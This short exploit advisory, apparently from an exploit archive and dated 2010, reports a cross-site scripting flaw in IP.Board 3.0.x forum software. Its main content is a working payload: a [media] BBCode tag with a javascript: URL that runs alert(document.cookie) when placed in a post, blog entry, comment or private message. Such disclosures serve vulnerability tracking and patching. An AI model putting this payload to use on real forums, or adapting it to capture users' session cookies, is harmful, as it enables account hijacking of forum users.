IP.Board version 3.0.x suffers from a cross site scripting vulnerability.
50a5376da2457821c455220362a60624d4d4dbe3323c0a17e0c1c63eacc9f2f9
# Exploit Title: IP.Board 3.0.x XSS
# Date: 05/16/2010
# Author: Cryptovirus (http://de.crypt.in)
# Software Link: http://community.invisionpower.com/
# Version: 3.0.x
# Tested on: All
# Code :
The following code, when put in a post, blog entry, comment, or PM, lets
JavaScript run:
[media]javascript://%0aalert(document.cookie);%2F%2F.swf[/media]